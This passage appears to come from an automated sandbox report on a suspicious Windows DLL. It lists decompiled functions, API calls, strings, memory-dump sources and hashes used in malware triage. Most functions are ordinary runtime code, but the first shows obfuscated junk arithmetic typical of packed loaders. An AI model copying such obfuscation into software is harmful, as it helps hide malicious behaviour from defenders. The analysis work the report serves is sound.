				if(_t300 >= _t369) {
					_t300 = _t369 * 0xffffffc3;
					 *0x6d5459f2 =  *0x6d5459f2 - _t300;
					_t348 = _t300;
				}
				_t107 = _t213 + 2; // 0x2
				_t371 = _t107 + _t348;
				 *0x6d5459d0 = _t371;
				_t446 =  *0x6d545a04 - 0x1b47; // 0x94
				if(_t446 != 0) {
					_t349 =  *(_t400 - 0x10);
				} else {
					_t300 = ( *0x6d5459e6 & 0x0000ffff) + _t348;
					_push(0);
					_t349 =  *(_t400 - 0x10) + 0x3b + _t300 * 2;
					asm("adc edi, eax");
					 *0x6d5459d8 = _t349;
					 *0x6d5459dc =  *(_t400 - 0x14);
					_t371 =  *0x6d5459d0; // 0x43d0c569
				}
				_t395 = 0x6d545a0e;
				do {
					if(_t300 != ( *0x6d5459e2 & 0x0000ffff)) {
						 *_t395 =  *_t395 + _t300;
						_t229 = _t300 + _t300;
						_t114 = _t229 + 5; // 0x5
						_t371 = _t114;
						_t115 = _t229 + 0x3b; // 0x3b
						_t300 = _t115 + _t371;
					}
					_t395 = _t395 - 4;
					_t216 = _t300;
				} while (_t395 > 0x6d5459e2);
				_t396 =  *(_t400 - 0x18);
				_t301 = 6;
				 *0x6d5459d0 = _t371;
				_t450 =  *0x6d545a02 - _t301; // 0x13ae
				if(_t450 != 0) {
					_t375 = _t371 + _t216 * 0xffffffc2;
					_t451 = _t375;
					 *0x6d5459d0 = _t375;
				}
				_t117 = _t396 + 7; // 0x7
				 *0x6d545a90 = _t117 + _t349 * 2;
				E6D47FB4A(_t396, _t451);
				_t350 =  *0x6d545a00; // 0x13aeb46e
				_t303 = 0x6d545ac8;
				_t372 =  *0x6d5459d8; // 0x914ee6d4
				do {
					_t452 = _t396 -  *0x6d545a18; // 0x4c
					if(_t452 != 0) {
						L80:
						_t120 = _t396 + 5; // 0x5
						 *0x6d5459dc = 0;
						_t372 = _t120 + _t350;
						 *_t303 =  *_t303 + _t396;
						 *0x6d5459d8 = _t372;
						asm("adc [ecx+0x4], eax");
						_t122 = _t396 + 0x3b; // 0x3b
						_t350 = _t122 + _t350 + _t372;
						 *0x6d545a00 = _t350;
					} else {
						_t453 = 0 -  *0x6d545a1c; // 0x0
						if(_t453 != 0) {
							goto L80;
						}
					}
					_t303 = _t303 - 0x10;
				} while (_t303 > 0x6d545a18);
				_t222 =  *0x6d5459dc; // 0x3
				_t456 = 0 - _t222;
				if(_t456 >= 0 && (_t456 > 0 || _t350 >= _t372)) {
					_push(0);
					_t354 = _t350 - _t372 * 0x3d - _t396;
					 *0x6d545a58 =  *0x6d545a58 - _t396;
					asm("sbb [0x6d545a5c], eax");
					 *0x6d545a00 = _t354;
					asm("sbb ecx, [0x6d5459dc]");
					_t372 = _t354 - _t372 + _t396;
					 *0x6d5459d8 = _t372;
					asm("adc ecx, eax");
					 *0x6d5459dc = 0;
				}
				_t305 =  *0x6d545a90; // 0x43cef7fd
				_t306 =  *0x6d5459d0; // 0x43d0c569
				 *0x6d5459d0 = _t306 + 0x3d + _t372 + _t305 * 2;
				return E6D4A0075(1);
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48128C
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,0000056D), ref: 6D4813C5
GetTempPathA.KERNEL32(0000056D,C:\Users\user\AppData\Local\Temp\,?,6D49FF71,?,00000001,?,?,00000001,?,6D5427E0,0000000C,6D4A006E,?,00000001,?), ref: 6D481468

Strings

part , xrefs: 6D4815B5
DZTm, xrefs: 6D48136C
YTm, xrefs: 6D4815FF
DZTm, xrefs: 6D48184B
E, xrefs: 6D481320, 6D481337, 6D4813E1, 6D4817B7, 6D481801, 6D48181E, 6D48191F
out drop , xrefs: 6D4816C8
6623, xrefs: 6D4816B1
DZTm, xrefs: 6D48144C
YTm, xrefs: 6D481A11
cd Matter m, xrefs: 6D481607
6265, xrefs: 6D4814CB
YTm, xrefs: 6D481915
cd Island, xrefs: 6D481531
(ZTm, xrefs: 6D48170E
C:\Windows\system32, xrefs: 6D4813B2
Molecul, xrefs: 6D48167E
Had s, xrefs: 6D4814DF
DZTm, xrefs: 6D481967
C:\Users\user\AppData\Local\Temp\, xrefs: 6D481459

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DirectoryH_prolog3PathSystemTemp
String ID: (ZTm$6265$6623$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$DZTm$DZTm$DZTm$DZTm$E$Had s$Molecul$cd Island$cd Matter m$out drop $part $YTm$YTm$YTm
API String ID: 3607090873-3293109978
Opcode ID: 5cdaf95911309f4f5ec5c587afcf65fbdc48957e68995f3376c9784790c60abc
Instruction ID: afbbcca64e58aa009c2940e22a9cb1095a0f64228fc2b93397ca47160b7e5e6c
Opcode Fuzzy Hash: 5cdaf95911309f4f5ec5c587afcf65fbdc48957e68995f3376c9784790c60abc
Instruction Fuzzy Hash: 6332AD71A022118FCF08EF69C481B7D77F1BB8A365B26852FD415DBB85E7309981CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6D4878D3, Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6D4878D3(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t11;
				intOrPtr* _t19;
				intOrPtr _t21;
				void* _t22;

				E6D4A00AC(0x6d4e8421, __ebx, __edi, __esi, 0);
				_t19 = __ecx;
				_push(8);
				 *__ecx = 0x6d4eaa30;
				_t21 = E6D49F8B6(__edx, __esi, __eflags);
				if(_t21 == 0) {
					_t21 = 0;
					__eflags = 0;
				} else {
					 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
					_push(1); // executed
					_t11 = E6D487005(__ebx, _t19, _t21); // executed
					 *((intOrPtr*)(_t21 + 4)) = _t11;
				}
				 *((intOrPtr*)(_t19 + 0x34)) = _t21;
				E6D487F47(_t19);
				return E6D4A0075(_t19);
			}

0x6d4878da
0x6d4878df
0x6d4878e1
0x6d4878e3
0x6d4878ee
0x6d4878f3
0x6d487906
0x6d487906
0x6d4878f5
0x6d4878f5
0x6d4878f9
0x6d4878fb
0x6d487901
0x6d487901
0x6d48790a
0x6d48790d
0x6d487919

APIs

__EH_prolog3.LIBCMT ref: 6D4878DA
std::locale::_Init.LIBCPMT ref: 6D4878FB

Part of subcall function 6D487005: __EH_prolog3.LIBCMT ref: 6D48700C
Part of subcall function 6D487005: std::_Lockit::_Lockit.LIBCPMT ref: 6D487017
Part of subcall function 6D487005: std::locale::_Setgloballocale.LIBCPMT ref: 6D487032
Part of subcall function 6D487005: _Yarn.LIBCPMT ref: 6D487048
Part of subcall function 6D487005: std::_Lockit::~_Lockit.LIBCPMT ref: 6D487088

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: 4e9d593cdda8be482c72c57fbf0f8124ac2043bd3d335062abdfcdbab8488329
Instruction ID: ceb17bfafb660c624dc8eaaaca6ca67ff9a1c10ffecb0081bb11b5c9e25429c7
Opcode Fuzzy Hash: 4e9d593cdda8be482c72c57fbf0f8124ac2043bd3d335062abdfcdbab8488329
Instruction Fuzzy Hash: B6E0DF72F6D6216BE311E7658511F2CB2906F80B99F67000DE2419F28ACFA0CC0043C2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CC7EF, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6D4CC7EF(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				void* _t16;
				signed int _t17;
				void* _t19;
				signed int _t20;
				long _t21;

				_t16 = __ecx;
				_t20 = _a4;
				if(_t20 == 0) {
					L2:
					_t21 = _t20 * _a8;
					if(_t21 == 0) {
						_t21 = _t21 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6d547b04, 8, _t21); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6D4DBEB2();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6D4C2281())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6D4C9256(_t15, _t16, _t17, _t19, __eflags, _t21);
						_pop(_t16);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t17 = _t13 % _t20;
				if(_t13 / _t20 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x6d4cc7ef
0x6d4cc7f5
0x6d4cc7fa
0x6d4cc808
0x6d4cc808
0x6d4cc80e
0x6d4cc810
0x6d4cc810
0x6d4cc827
0x6d4cc830
0x6d4cc838
0x00000000
0x00000000
0x6d4cc818
0x6d4cc81a
0x6d4cc83c
0x6d4cc841
0x6d4cc847
0x00000000
0x6d4cc847
0x6d4cc81d
0x6d4cc822
0x6d4cc823
0x6d4cc825
0x00000000
0x00000000
0x6d4cc825
0x00000000
0x6d4cc827
0x6d4cc800
0x6d4cc801
0x6d4cc806
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6D4CD6B4,00000001,00000364,?,6D4A0F8B,00000002,00000000,?,?,?,6D461298,6D4875D9), ref: 6D4CC830

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c043e240a2d5ef99e04688abb00d1237ecfe2e4bcb45df49609862368f29f71a
Instruction ID: 2ac6d8452e3a0dc0190e67be7deb131f3e1b9324b6344bfac6c10351b0476468
Opcode Fuzzy Hash: c043e240a2d5ef99e04688abb00d1237ecfe2e4bcb45df49609862368f29f71a
Instruction Fuzzy Hash: 90F0E939A441266BEF315A66C805F6B3B58AF92772B259125AD94D6280CF30DC0082F3

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CF26D, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6D4CF26D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				long _t11;

				_t8 = __ecx;
				_t11 = _a4;
				if(_t11 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6D4C2281())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t11 == 0) {
					_t11 = _t11 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6d547b04, 0, _t11); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6D4DBEB2();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E6D4C9256(_t7, _t8, _t9, _t10, __eflags, _t11);
					_pop(_t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x6d4cf26d
0x6d4cf273
0x6d4cf279
0x6d4cf2ab
0x6d4cf2b0
0x6d4cf2b6
0x00000000
0x6d4cf2b6
0x6d4cf27d
0x6d4cf27f
0x6d4cf27f
0x6d4cf296
0x6d4cf29f
0x6d4cf2a7
0x00000000
0x00000000
0x6d4cf287
0x6d4cf289
0x00000000
0x00000000
0x6d4cf28c
0x6d4cf291
0x6d4cf292
0x6d4cf294
0x00000000
0x00000000
0x6d4cf294
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,6D4875D9,00000000,?,6D4A0F8B,00000002,00000000,?,?,?,6D461298,6D4875D9,00000004,00000000,00000000,00000000), ref: 6D4CF29F

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0a4f9ae9f2d8fb31c3b89033462d7275fe7d83ee0ab0db7d9a47cf10c95722f1
Instruction ID: 4b0a07c8f5e392a97745b9acb1d3766a8516ca0433f13326c5c9bc626788925c
Opcode Fuzzy Hash: 0a4f9ae9f2d8fb31c3b89033462d7275fe7d83ee0ab0db7d9a47cf10c95722f1
Instruction Fuzzy Hash: 4AE02B3E1071226BEB1156699C00F9B3B68EF833B0F220124DD24972C0CF2ACC00C1E3

Uniqueness

Uniqueness Score: -1.00%

Function 6D49F9E7, Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E6D49F9E7(void* __ebx, void* __ecx, void* __edx) {
				void* _t3;
				void* _t10;

				if(E6D4A079B() == 0) {
					_push(E6D48815F()); // executed
					_t3 = E6D4C9E70(__ecx, __edx); // executed
					_pop(_t10);
					if(_t3 == 0) {
						L6D4CA4FC(__ebx, _t10);
						goto L5;
					} else {
						return 0;
					}
				} else {
					E6D4A0604(__edx);
					L5:
					return 1;
				}
			}

0x6d49f9ee
0x6d49f9fc
0x6d49f9fd
0x6d49fa02
0x6d49fa05
0x6d49fa0a
0x00000000
0x6d49fa07
0x6d49fa09
0x6d49fa09
0x6d49f9f0
0x6d49f9f0
0x6d49fa0f
0x6d49fa11
0x6d49fa11

APIs

___isa_available_init.LIBCMT ref: 6D49F9F0

Part of subcall function 6D4A0604: IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6D4A061D

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FeaturePresentProcessor___isa_available_init
String ID:
API String ID: 1134542133-0
Opcode ID: 9730a72df3bd01377a0f65105c100b5bb7fbad41c174d80457b8ba70273eb9d5
Instruction ID: 0a2e26349a1580d43838ba31c9b8a3c8a5ca91e883c873d6ded9bb09d40a066c
Opcode Fuzzy Hash: 9730a72df3bd01377a0f65105c100b5bb7fbad41c174d80457b8ba70273eb9d5
Instruction Fuzzy Hash: BEC0800C05D143206D4091772504D3F37440CF32DD75A144CEF209D159DF15CC4140B7

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6D4DE6EC, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6D4DE6EC(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short _a4, short* _a8, char _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed short _t104;
				signed int _t107;
				void* _t108;

				_t39 =  *0x6d54506c; // 0xff2bc58a
				_v8 = _t39 ^ _t107;
				_t3 =  &_a12; // 0x6d4ce03b
				_t89 =  *_t3;
				_t104 = _a4;
				_v28 = _a8;
				_v24 = E6D4CD5FF(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6D4CD5FF(_t89, __ecx, __edx);
				_t8 =  &_v20; // 0x6d4ce03b
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
				_t92 = _t104 + 0x80;
				_t46 = _v24;
				 *_t46 = _t104;
				_t102 =  &(_t46[2]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x6d4f2f04; // 0x17
					E6D4DE68F(0, " )OmU", _t85 - 1, _t102);
					_t46 = _v24;
					_t108 = _t108 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					_t21 =  &_v20; // 0x6d4ce03b
					E6D4DE00E(_t92, _t99, _t21);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						_t16 =  &_v20; // 0x6d4ce03b
						E6D4DE112(_t92, _t99, _t16);
					} else {
						_t15 =  &_v20; // 0x6d4ce03b
						E6D4DE077(_t92, _t99, _t15);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x6d4f2dec; // 0x41
						_t77 = E6D4DE68F(_t99, "t!OmE", _t75 - 1, _v24);
						_t108 = _t108 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t104 = E6D4DE518(_t92,  ~_t104 & _t104 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t104;
								if(_t104 == 0) {
									goto L22;
								}
								__eflags = _t104 - 0xfde8;
								if(_t104 == 0xfde8) {
									goto L22;
								}
								__eflags = _t104 - 0xfde9;
								if(_t104 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t104 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t104;
								}
								E6D4D45D6(_t89, _t94, _t103, __eflags, _v16,  &(_v24[0x128]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E6D49F8A5(_v8 ^ _t107, _t99, _t104);
								}
								E6D4D45D6(_t89, _t94, _t103, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								E6D4E5124( &(_t89[0x80]), _t104,  &(_t89[0x80]), 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E6D4DE112(_t92, _t99,  &_v20);
						} else {
							E6D4DE077(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}

APIs

Part of subcall function 6D4CD5FF: GetLastError.KERNEL32(?,6D55CE94,6D4C1803,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,43D0C569), ref: 6D4CD603
Part of subcall function 6D4CD5FF: _free.LIBCMT ref: 6D4CD636
Part of subcall function 6D4CD5FF: SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,43D0C569), ref: 6D4CD677
Part of subcall function 6D4CD5FF: _abort.LIBCMT ref: 6D4CD67D

Part of subcall function 6D4CD5FF: _free.LIBCMT ref: 6D4CD65E
Part of subcall function 6D4CD5FF: SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,43D0C569), ref: 6D4CD66B

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6D4DE7F8
IsValidCodePage.KERNEL32(00000000), ref: 6D4DE853
IsValidLocale.KERNEL32(?,00000001), ref: 6D4DE862
GetLocaleInfoW.KERNEL32(?,00001001,;Lm,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 6D4DE8AA
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 6D4DE8C9

Strings

;Lm, xrefs: 6D4DE715, 6D4DE725, 6D4DE7E5, 6D4DE787, 6D4DE77C, 6D4DE77F, 6D4DE78A, 6D4DE7E8
)OmU, xrefs: 6D4DE751
;Lm, xrefs: 6D4DE702, 6D4DE8A1
t!OmE, xrefs: 6D4DE7A5
;Lm, xrefs: 6D4DE821, 6D4DE7C3, 6D4DE7CE

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: )OmU$;Lm$;Lm$;Lm$t!OmE
API String ID: 745075371-878682921
Opcode ID: 7c488855f2ee7bf9a482f966534ad95c530f3396194c71561159277159ba808a
Instruction ID: 9117819e45c3ad3066aba630ff8dd0c8fe971fb930b27f42b8a790f06084695f
Opcode Fuzzy Hash: 7c488855f2ee7bf9a482f966534ad95c530f3396194c71561159277159ba808a
Instruction Fuzzy Hash: C3516171A00206ABEF90DFA5CC94EBEB7B8BF45700F254039E5A4E7290EB70DD4187A1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DDD96, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E6D4DDD96(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, signed short* _a8, char _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __esi;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				void* _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				signed int _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				void* _t130;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__edi);
				_t34 = E6D4CD5FF(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E6D4DDD27(" )OmU", 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E6D4DD652(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E6D4DD775();
					} else {
						E6D4DD6DB(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E6D4DDD27("t!OmE", 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E6D4DD775();
							} else {
								E6D4DD6DB(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E6D4DDBAF(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t13 =  &_a12; // 0x6d4ce042
						_t121 =  *_t13;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t89 = _t121 + 0x120;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E6D4DD5B2(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6D4C2188();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x6d54506c; // 0xff2bc58a
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E6D4CD5FF(_t89, _t100, _t116);
								_t122 =  *(E6D4CD5FF(_t90, _t100, _t116) + 0x34c);
								_t129 = E6D4DE4C7(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E6D4D806D(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v252);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E6D4DE5FB(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								_pop(_t130);
								__eflags = _v12 ^ _t132;
								return E6D49F8A5(_v12 ^ _t132, _t116, _t130);
							} else {
								_t68 = E6D4D4323(_t100, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t92 = _t121 + 0x80;
									if(E6D4D4323(_t100, _t154, _t121 + 0x120, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E6D4E7BBB(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											if(E6D4D4323(_t112, _t157, _t121 + 0x120, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E6D4E7BBB(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												E6D4E5124(_t112, _t127, _t121 + 0x100, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}

APIs

Part of subcall function 6D4CD5FF: GetLastError.KERNEL32(?,6D55CE94,6D4C1803,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,43D0C569), ref: 6D4CD603
Part of subcall function 6D4CD5FF: _free.LIBCMT ref: 6D4CD636
